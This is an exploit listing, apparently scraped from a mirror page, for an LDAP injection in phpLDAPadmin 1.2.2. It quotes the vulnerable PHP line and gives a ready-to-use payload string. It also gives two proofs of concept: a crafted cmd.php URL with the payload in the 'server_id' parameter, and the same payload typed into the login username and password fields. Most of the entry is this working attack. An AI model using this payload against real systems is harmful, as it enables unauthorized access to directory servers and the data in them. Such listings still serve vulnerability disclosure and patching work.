扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 |
# Exploit Title: phpLDAPadmin 1.2.2 - 'server_id' LDAP Injection (Username) # Google Dork:N/A # Date: 21.06.2018 # Exploit Author: Berk Dusunur # Vendor Homepage: http://phpldapadmin.sourceforge.net # Software Link: http://phpldapadmin.sourceforge.net # Version: 1.2.2 # Tested on: Pardus / Debian Web Server # CVE : N/A #Vulnerable Code $server = $_SESSION[APPCONFIG]->getServer(get_request('server_id','REQUEST')); if (count($server->untested())) system_message(array( #Payload !(()&&!|*|*| #PoC 1 http://target/phpldapadmin/cmd.php?cmd=login_form&server_id=1!(()&&!|*|*|&redirect=true #PoC 2 login panel username use !(()&&!|*|*| password !(()&&!|*|*| |
体验盒子
